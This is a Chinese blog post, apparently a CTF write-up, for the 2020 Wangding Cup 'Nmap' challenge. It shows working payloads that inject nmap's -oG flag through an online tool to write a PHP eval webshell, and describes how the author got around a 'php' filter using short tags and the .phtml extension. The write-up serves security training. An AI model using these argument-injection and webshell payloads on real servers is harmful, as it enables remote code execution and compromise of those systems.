2020/7/15 - [网鼎杯 2020 朱雀组]Nmap - nmap写入webshell


这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。

' <?=eval($_POST[a]);?> -oG 1.phtml '

1. 这个应该也是有那两个函数。

说的是哪两个函数呢?就是escapeshellarg与escapeshellcmd两个函数啦,去我博客里搜这两个关键词应该可以搜得到,
我的博客
然后就是老套路了,先用猜测得payload实验

' <?php eval($_POST["hack"]); ?> -oG hack.php '

然后就提示了
在这里插入图片描述
这种情况不要急,几番猜测下来,是过滤了php。那我们就用phtml啊,然后我们把一句话的代码换成短标签,最终得payload为

' <?=eval($_POST["hack"]); ?> -oG hack.php '

蚁剑一连,然后在主目录下发现flag。

在这里插入图片描述

2.我所犯的错误

我这次复现并不是一开始就是对的,开始的话因为空格和单引号的问题错了几次,就像下面。

在这里插入图片描述
导致这两次没解析成功,后面参考了别人得博客才成功,细节啊。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值